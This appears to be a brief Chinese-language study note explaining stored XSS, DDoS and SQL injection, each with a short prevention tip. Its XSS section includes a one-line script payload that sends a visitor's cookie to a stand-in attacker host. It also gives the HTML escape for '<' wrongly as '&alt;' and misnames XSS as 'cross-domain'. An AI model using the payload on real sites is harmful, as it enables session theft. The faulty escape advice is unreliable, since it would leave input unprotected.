- XSS:全称是跨域脚本攻击(Cross Site Scripting),因为缩写和 CSS 重名,所以采用 XSS。
原理:在网页中提交评论的时候本来应该都是字符串的,却提交的是 script 代码,这就会将 scrip 代码存储到数据库中,下次拉取该评论的时候就会执行该 script 代码。如果是坏人恶意的会怎么样?比如下面:
<script>window.open(“www.huairen.com?param=”+document.cookie)</script>
// 坏人获取了该用户的 cookie
预防:将输入的 <script> 进行转义,如将 < 转义成 &alt;
-
DDOS:分布式拒绝服务攻击(Distributed Denial of Service),是 DOS 的升级版,利用公共计算机,同时向一个服务器发送大量请求导致服务器瘫痪。
原因:服务器的带宽不够
预防:1. 增加带宽,不过带宽是非常昂贵的,而黑客的免费 ip 却是大量的,所以这个方法不是很有效。2. 求助于云服务商 -
sql注入:在 HTTP 请求参数上写相应的 sql 命令,服务器执行 sql 语句对数据库进行更改。
预防:对请求参数进行预解析,将 sql 命令解析成普通字符串
推荐:
跨站脚本功攻击,xss,一个简单的例子让你知道什么是xss攻击
CSRF攻击与防御
什么是跨域,有什么攻击,如何防止攻击